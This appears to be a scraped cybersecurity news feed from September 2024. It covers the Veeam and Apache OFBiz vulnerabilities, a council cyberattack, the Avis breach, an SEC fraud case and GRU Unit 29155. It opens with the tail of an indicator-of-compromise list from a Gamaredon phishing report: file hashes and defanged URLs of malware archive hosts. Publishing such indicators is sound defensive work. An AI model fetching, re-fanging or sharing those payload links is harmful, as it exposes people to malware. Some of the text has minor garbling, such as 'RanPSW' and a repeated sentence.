dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1 SHA256 XHTML 0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f SHA256 XHTML 57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c SHA256 XHTML 0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452 SHA256 XHTML dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8 SHA256 XHTML c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d SHA256 XHTML e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099 SHA256 XHTML 92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0 SHA256 XHTML 1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3 SHA256 XHTML b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3 SHA256 XHTML b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda SHA256 XHTML 7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae SHA256 XHTML be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87 SHA256 XHTML de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891 SHA256 XHTML 66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040 SHA256 XHTML 450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87 SHA256 XHTML d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80 SHA256 XHTML 7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c SHA256 XHTML 37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655 SHA256 XHTML efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3 SHA256 XHTML ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e SHA256 XHTML 5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1 SHA256 XHTML 112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8 SHA256 XHTML cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699 SHA256 XHTML c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1 SHA256 XHTML 6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc SHA256 XHTML 11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a SHA256 XHTML 7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9 SHA256 XHTML 982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90 SHA256 XHTML 5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f SHA256 XHTML 663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0 SHA256 XHTML hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar URL Malicious URL hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar URL Malicious URL hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar URL Malicious URL hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar URL Malicious URL hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar URL Malicious URL hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar URL Malicious URL hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar URL Malicious URL hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar URL Malicious URL hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar URL Malicious URL hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar URL Malicious URL hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar URL Malicious URL hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar URL Malicious URL hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar URL Malicious URL hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar URL Malicious URL hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar URL Malicious URL hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar URL Malicious URL hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar URL Malicious URL The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.
by CYBLE
2024-09-06 08:30:41
Cequence Security partners with Netskope to provide protection for business-critical APIsCequence Security announced a new partnership with Netskope. Through the partnership, Netskope customers can now leverage unique API threat intelligence from the Cequence Unified API Protection (UAP) platform to unlock insights into real-world threats and ultimately strengthen organizational security posture. Cybercriminals increasingly target APIs and deploy automated attacks such as bots, exposing organizations to data breaches, compliance violations, and financial loss. The explosive growth of APIs has created a complex threat landscape, requiring comprehensive solutions … More → The post Cequence Security partners with Netskope to provide protection for business-critical APIs appeared first on Help Net Security.
by Help Net Security
2024-09-06 08:25:12
September 2024: Latest Malware, Vulnerabilities and ExploitsWelcome to Picus Security''s monthly cyber threat intelligence roundup!
by Picus Security
2024-09-06 08:19:25
4 Ways to Future-Proof Your Firm in the Digital AgeFrom small businesses to giant corporations, sophisticated cyberattacks are not just prevalent but effective at crippling data and services. To safeguard your business against these cybersecurity threats, you must take a holistic approach that spans strong security measures such as cyber insurance coverage and protection. Cybersecurity Threats Explained The first part of securing your business is knowing the different cybersecurity threats that can come at you. Common threats include: Phishing Attacks: Cybercriminals take up the guise of trustworthy sources to send fictitious emails and get employees to share sensitive information. Malware: Software intended to damage or disable computer systems on a network. Ransomware: Malicious software that encrypts data and extorts a ransom for its release. Data Breach: A data breach leads to unauthorized access to confidential information, often involving data theft or exposure. DDoS Attacks: Using traffic to overwhelm a service so it cannot function properly. An important part is knowing how these threats can work to devise countermeasures. The proper thing to do in this case is implement strong cybersecurity so your business cannot be hacked. Steps to Implement Strong Cybersecurity 1. Secure Your Network Protect your network from unauthorized access by securing them with firewalls, encryption, and secure Wi-Fi connections. Ensure regular maintenance of your software and hardware to plug areas that cybercriminals can take advantage of. 2. Strong Password Policies Enforce strong password policies that mandate employees to use complex passwords and change them periodically. Urge members to opt for multi-factor authentication (MFA) helping ensure increased security. 3. Regular Software Updates Try to keep everything updated, from operating systems to applications. Scheduled updates usually included patches for potential security risks. 4. Employee Training Train your employees on cybersecurity. Basic instructional courses on how to identify phishing emails, not reuse passwords, and maintain secure practices around software applications can be regularly implemented for a couple of minutes at the beginning before your other critical coursework discussions. 5. Data Encryption This applies to encrypting all sensitive data in transit and at rest. This keeps the data (even if captured in transit) unreadable unless you have that decryption key. 6. Backup Data Regularly Backup your data on an ongoing basis to a secure location If you experience a ransomware attack or data breach, backups also provide options for restoring your info offline instead of paying to retrieve it. 7. Access Control Control exposure to sensitive data by role-based employees follows the principle of least privilege by allowing workers to access only data they need for their job responsibilities. Cyber Security Insurance The importance of having strong cybersecurity defenses in place notwithstanding, planning for failure following a cyberattack is essential as well. Cybersecurity insurance helps address this requirement. There are types of insurance, generally called cyber security insurance or cyber liability insurance, that can be written into a policy to help protect businesses against the impact of these events. This includes the cost of the following things Data Breach Notification: The policy provides coverage for the costs associated with notifying affected parties of a data breach. Legal Fees: These are your costs to have a legal professional represent you and remain in compliance with applicable laws. RanPSW Payments: In case of a ransomware attack, insurance can contribute to the ranPSW recovery. Business Interruption: Payments for lost income resulting from a cyberattack shutting down business operations. Costs of implementing a crisis management plan for public relations to manage the aftermath of a cyber incident. Why is Cyber Security Insurance Needed? Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop, resulting in economic protection for your business to recover without breaking the bank. Reputation Management: The reputation of your business is at stake due to a cyberattack. Insurance may cover public relations work to restore trust with customers and stakeholders Maintain peace of mind: With your business being secured by cyber security insurance, know that you can move on to the next challenge such as growth or innovation. Well, having a dedicated developer and following the best programming practices could serve as your shield against security failures (which is not attending quickly enough in case there is an intrusion), even the most knowledgeable programmer should prepare himself on what exactly he will do if his site does get hacked. A clear incident response plan is imperative for dealing with the fallout of a cyber attack. Your plan should include: Preparation: Create a cybersecurity team and conduct regular practice sessions Detection: Set up monitoring to catch possible intruders Contain: Immediately shut down infected systems to prevent the attack from spreading Removal: Take the malware off your network, and patch any security holes Recovery: Return to normal operations by restoring systems, applications, and data from backups Insights Gained: Review the incident and what was learned, to further strengthen corporate defenses against future attacks. Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and making sure to have cyber security coverage. You can get your business ready for the ever-changing game of cyber threats if you know what to look out for and how to protect yourself! Cybersecurity insurance is one of the best ways to make sure that your business has a backup plan in case things don''t go as planned.
by The Cyber Express
2024-09-06 08:13:21
Apache fixed a new remote code execution flaw in Apache OFBizApache addressed a remote code execution vulnerability affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache OFBiz® is an open source product for the automation of enterprise processes that includes framework components and business […]
by Security Affairs
2024-09-06 08:12:53
Tewkesbury Council Shuts Down Systems After Cyberattack, Investigation UnderwayTewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The Tewkesbury Borough Council prompted the council to take immediate action by shutting down its systems to contain the Tewkesbury Borough Council cyberattack. As the investigation unfolds, the council''s Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from their systems. Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation Upon discovering the Tewkesbury Borough Council cyberattack, Tewkesbury Borough Council enacted ""necessary cyber response steps"" to address the situation. The council''s action included shutting down all systems to prevent further potential damage. An ongoing investigation is being conducted with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time. In an official statement, the council provided precautionary advice to residents and customers, urging them to remain vigilant. The advisory highlights the importance of being cautious of phishing emails and fraudulent activities, using strong and unique passwords, and promptly changing passwords if any suspicious activity is detected. The council also recommended checking further guidance available on the National Cyber Security Centre''s website. Public Communication and Support In a statement to BBC Radio Gloucestershire, Cunningham detailed the discovery of unknown user accounts within the council’s system, which led to the immediate system shutdown. He confirmed that there was no evidence suggesting that data had been removed or exfiltrated. Cunningham stressed that the primary focus is on ensuring services for vulnerable residents while investigating the extent of the Tewkesbury Borough Council cyberattack. ""We have now re-established our phone line and are working on building new computers to expand our phone line capabilities,"" Cunningham said. He also pointed out that although the council''s website remains operational and unaffected, normal services are limited. I don''t want someone who''s at risk of losing their house or who can''t feed their children not to be able to talk to my staff,"" Cunningham added. To assist residents, council staff will be available at several locations: Bishop’s Cleeve Parish Council until 15:00 BST Churchdown police bus at Tesco car park until 16:00 BST Brockworth Community Centre at Court Road until 16:00 BST Data Protection and Community Assurance The council has appointed Graeme Simpson as the Data Protection Officer to handle inquiries related to the cyberattack on Tewkesbury Borough Council. Residents concerned about the data breach can contact Simpson via the email address provided in the council''s communication. Despite the current challenges, the council is committed to providing updates and ensuring that residents are informed of any potential risks to their data. As part of its ongoing response, the council continues to work diligently to understand the full scope of the cyberattack. ""We do not know the extent of the infiltration of our system,"" Cunningham admitted. He emphasized the importance of not reopening all services until a thorough assessment is completed, citing that waste and recycling services remain operational during this period. The Cyber Express reached out to Tewkesbury Borough Council for further details on the cyberattack. As of now, no additional official statements have been provided.
by The Cyber Express
2024-09-06 08:00:20
How cybercriminals attack young gamers: the most common and dangerous scams | Kaspersky official blogOur new report investigates cyberthreats aimed at child gamers.
by Kaspersky
2024-09-06 08:00:14
Veza and HashiCorp join forces to help prevent credential exposureVeza announced a partnership with HashiCorp to deliver an integrated solution for solving modern identity security challenges. Together, the Veza Access Platform and HashiCorp Vault empower joint customers to strengthen their identity security posture by bringing least privilege to the management of secrets and keys. With cloud and SaaS investments maturing rapidly, coupled with the advent of new technologies like Generative AI (GenAI), the complexity of enterprise environments has created a significant challenge for security … More → The post Veza and HashiCorp join forces to help prevent credential exposure appeared first on Help Net Security.
by Help Net Security
2024-09-06 07:59:24
Avis Car Rental Suffers Data Breach Exposing Customer InformationAvis Car Rental has reported a data breach affecting customers'' personal information after an unauthorized party accessed one of its business applications. The breach occurred between August 3 and August 6, 2024, compromising customer data, including names and other sensitive details. Avis says it has since contained the breach, launched an investigation with cybersecurity experts, … The post Avis Car Rental Suffers Data Breach Exposing Customer Information appeared first on CyberInsider.
by Cyber Insider
2024-09-06 07:58:01
SEC Accuses Former CIRCOR Executive of Misleading Financial DisclosuresThe US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company''s finances. This case highlights the importance of accurate and transparent financial reporting. The U.S. The SEC has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. Bowerman is accused of misleading financial disclosures, specifically making false statements about the company''s finances. This case emphasizes the significance of precise and transparent financial reporting practices. (SEC) announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman’s fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR’s public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation. The Allegations Against Bowerman Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC’s complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering’s internal financial records, leading to inaccurate figures being incorporated into CIRCOR’s consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR’s senior management and external auditors. The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR’s public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021. CIRCOR’s Internal Control Failures In addition to the charges against Bowerman, the SEC’s findings also highlight broader issues within CIRCOR’s internal accounting systems. According to the SEC’s order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman’s fraudulent activities to go undetected for an extended period. The SEC’s investigation revealed that CIRCOR’s inability to detect Bowerman’s misconduct contributed to the company’s overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws’ financial reporting, books and records, and internal accounting controls provisions. CIRCOR’s Response and Remedial Measures In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC’s enforcement actions against CIRCOR. The SEC acknowledged CIRCOR’s extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman’s unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. Key actions taken by CIRCOR included: Strengthening its internal accounting controls. Hiring additional experienced finance and accounting personnel. Cancelling compensation that was scheduled to be paid to a former executive officer. These actions, coupled with CIRCOR’s cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC’s Philadelphia Regional Office, “While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty.” Charges Against Bowerman While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including: Injunctive relief to prevent him from engaging in further securities law violations. Disgorgement of any ill-gotten gains, along with prejudgment interest. Civil penalties to further hold Bowerman accountable for his actions. These charges reflect the seriousness of Bowerman’s alleged misconduct, which undermined the integrity of CIRCOR’s financial disclosures and harmed investors who relied on the company’s public filings. As part of the SEC’s final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.
by The Cyber Express
2024-09-06 07:43:24
U.S. Offers $10M for Info on Five State-Backed Russian HackersThe U.S. government has indicted five Russian military intelligence officers from the GRU and one civilian for their role in a series of cyberattacks on Ukraine and NATO countries. In connection with this, the U.S. Department of State is offering a reward of up to $10 million for any information leading to their capture or … The post U.S. Offers $10M for Info on Five State-Backed Russian Hackers appeared first on CyberInsider.
by Cyber Insider
2024-09-06 07:09:50
Russia-linked GRU Unit 29155 targeted critical infrastructure globallyThe United States and its allies state that Russia-linked threat actors operating under the GRU are behind global critical infrastructure attacks. The FBI, CISA, and NSA linked threat actors from Russia’s GRU Unit 29155 to global cyber operations since at least 2020. These operations include espionage, sabotage, and reputational damage. The United States and its […]
by Security Affairs
2024-09-06 07:04:07
Veeam Security Bulletin Fixes Critical Vulnerabilities for Backup & Replication, Veeam ONE and MoreVeeam has published a new Security Bulletin addressing multiple critical vulnerabilities across its suite of products. The Veeam security bulletin, identified as KB ID: 4649, includes updates on Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. The security issues detailed in this bulletin highlight several high-severity vulnerabilities that could impact the security and functionality of Veeam’s solutions. This article provides a short glimpse into these updates offered by the Veeam security bulletin. Key Highlights from the Veeam Security Bulletin Here''s a detailed look at the vulnerabilities discovered and their respective fixes: 1. Veeam Backup & Replication Several vulnerabilities affecting Veeam Backup & Replication 12.1.2.172 and earlier versions have been reported. These vulnerabilities include: CVE-2024-40711: This critical vulnerability allows unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH, it carries a CVSS v3.1 score of 9.8. CVE-2024-40713: A high-severity vulnerability enabling a low-privileged user to alter Multi-Factor Authentication (MFA) settings, thus bypassing MFA. It has a CVSS v3.1 score of 8.8. CVE-2024-40710: This series of high-severity vulnerabilities allow remote code execution (RCE) under the service account and extraction of sensitive information. It also scores 8.8 on the CVSS v3.1 scale. CVE-2024-39718: Allows low-privileged users to remotely delete files on the system with service account permissions. It holds a CVSS v3.1 score of 8.1. CVE-2024-40714: A high-severity vulnerability in TLS certificate validation can let an attacker intercept sensitive credentials during restore operations, scoring 8.3 on the CVSS v3.1 scale. CVE-2024-40712: This path traversal vulnerability permits local privilege escalation (LPE) for an attacker with low-privileged access. It carries a CVSS v3.1 score of 7.8. The solutions for these issues are included in Veeam Backup & Replication version 12.2 (build 12.2.0.334). 2. Veeam Agent for Linux For Veeam Agent for Linux, version 6.1.2.178 and earlier are affected by: CVE-2024-40709: This high-severity vulnerability enables local privilege escalation to the root level and scores 7.8 on the CVSS v3.1 scale. This issue is resolved in Veeam Agent for Linux version 6.2 (build 6.2.0.101), which is included with Veeam Backup & Replication 12.2. 3. Veeam ONE Veeam ONE 12.1.0.3208 and earlier versions are affected by several vulnerabilities: CVE-2024-42024: Allows remote code execution on the Veeam ONE Agent machine with possession of service account credentials. It has a CVSS v3.1 score of 9.1. CVE-2024-42019: Grants access to the NTLM hash of the Veeam Reporter Service account, requiring user interaction. It scores 9.0 on the CVSS v3.1 scale. CVE-2024-42023: Enables low-privileged users to execute code with Administrator privileges remotely, with a severity score of 8.8. CVE-2024-42021: Allows attackers with valid access tokens to access saved credentials, scoring 7.5 on the CVSS v3.1 scale. CVE-2024-42022: Allows modification of product configuration files, also scoring 7.5. CVE-2024-42020: HTML injection vulnerability in Reporter Widgets, scoring 7.3. These vulnerabilities are addressed in Veeam ONE v12.2 (build 12.2.0.4093). 4. Veeam Service Provider Console The Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier versions have been identified with: CVE-2024-38650: A critical vulnerability permitting low-privileged attackers to access the NTLM hash of the service account on the VSPC server, scoring 9.9 on the CVSS v3.1 scale. CVE-2024-39714: Allows low-privileged users to upload arbitrary files, leading to remote code execution on the VSPC server. This issue also scores 9.9. CVE-2024-39715: Similar to CVE-2024-39714 but through REST API access, with a high severity score of 8.5. CVE-2024-38651: Allows low-privileged users to overwrite files, leading to remote code execution, with a CVSS v3.1 score of 8.5. The fixes are included in Veeam Service Provider Console v8.1 (build 8.1.0.21377). 5. Veeam Backup for Nutanix AHV and Other Plug-Ins Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, as well as Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45, are impacted by: CVE-2024-40718: Allows local privilege escalation through an SSRF vulnerability, with a severity score of 8.8 on the CVSS v3.1 scale. These issues are resolved in Veeam Backup for Nutanix AHV Plug-In v12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299, both included with Veeam Backup & Replication 12.2. Conclusion This comprehensive Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update to the latest versions of Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and other related products to mitigate these vulnerabilities. Regular updates and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.
by The Cyber Express
2024-09-06 06:25:46
Russian Cyber Unit 29155 Exposed: Targeting NATO and Allied NationsThe United States, along with its allies, has formally identified a group of Russian hackers, tracked under names like Cadet Blizzard and Ember Bear, as being responsible for large-scale attacks on the US global critical infrastructure. These hackers are linked to Unit 29155 of Russia''s Main Directorate of the General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations. In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from GRU’s 161st Specialist Training Center, have been involved in cyber sabotage since 2020, with the leadership and oversight of the experienced members of Unit 29155. These operations have not only targeted critical infrastructure but also carried out sabotage and assassination attempts throughout Europe. WhisperGate Malware and Cyberattacks The group gained significant notoriety in January 2022 when they deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign aimed at destabilizing Ukraine and interfering with the efforts of NATO and allied nations to support the country. This malware was a signal of the hackers'' capabilities, marking a shift from cyber-espionage to outright data destruction. WhisperGate attacks began on January 13, 2022, focusing on disrupting Ukraine’s defense and critical services. The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, this group has pivoted its focus toward disrupting aid efforts for Ukraine, expanding its cyber toolkit to include methods that blend espionage with destruction. The joint advisory stresses that the hackers are honing their technical skills and building their experience by conducting more advance cyber operations across various global regions. Unit 29155: A Wide Range of Attacks Across Continents According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks that have affected NATO countries, along with others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. These attacks have not been limited to Ukraine but have spread across multiple sectors, including energy, government services, and financial institutions. As a result, critical infrastructure across NATO member states has faced increasing risks of being compromised. The FBI has been tracking the activities of Unit 29155 closely, having detected over 14,000 domain scanning attempts targeting at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks. U.S. Offers Reward for Key GRU Officers In response to these attacks, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or capture of five Russian military intelligence officers. These individuals are believed to be part of the GRU''s Unit 29155 and include Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin. [caption id=""attachment_89265"" align=""aligncenter"" width=""1024""] Source: X[/caption] These officers are accused of carrying out cyber operations that have harmed critical U.S. infrastructure, with particular emphasis on energy, government, and aerospace sectors. Their cyber activities are linked to the sabotage of Western countries’ efforts to support Ukraine and disrupt various sectors critical to national security. In addition to the military officers, a civilian named Amin Timovich has also been indicted for his involvement in the WhisperGate attacks against Ukraine. This indictment, along with charges against the five GRU officers, highlights the seriousness of Russia’s cyber operations and the coordinated efforts to bring those responsible to justice. [caption id=""attachment_89266"" align=""aligncenter"" width=""739""] Source: X[/caption] Protecting Critical Infrastructure: Recommendations As Unit 29155 continues its cyber operations across the globe, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by cybersecurity authorities include: Patching vulnerabilities in systems to close potential entry points for cyberattacks. Implementing phishing-resistant multifactor authentication (MFA) to strengthen account security, particularly for services like webmail and virtual private networks (VPNs). Segmenting networks to contain any malicious activity should an intrusion occur. These defensive strategies are especially important for organizations within sectors frequently targeted by Russian hackers, including energy, transportation, healthcare, and government services. Global Concerns and Long-Term Implications Since Russia’s invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside the WhisperGate malware, other destructive tools like HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned early on that such malware could easily spread beyond Ukraine, affecting global systems if defenses were not adequately prepared. Wednesday’s announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns highlights the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the upcoming 2024 U.S. presidential election. Tracking Cyber Threats: Industry and Government Coordination The cybersecurity industry plays a critical role in identifying and mitigating threats posed by groups like Unit 29155. Leading cybersecurity firms and government agencies continuously track the activities of Russian cyber actors, with various naming conventions such as Cadet Blizzard (tracked by Microsoft) and Ember Bear (CrowdStrike). These cyber groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems. As Unit 29155 continues its cyber operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more critical. While the hunt for the Russian GRU officers involved in these attacks intensifies, the larger challenge remains how to effectively mitigate and defend against the growing cyber threats facing the world today.
by The Cyber Express
2024-09-06 05:02:07
September 2024 Patch Tuesday forecast: Downgrade is the new exploitI asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … More → The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.
by Help Net Security
2024-09-06 05:00:15
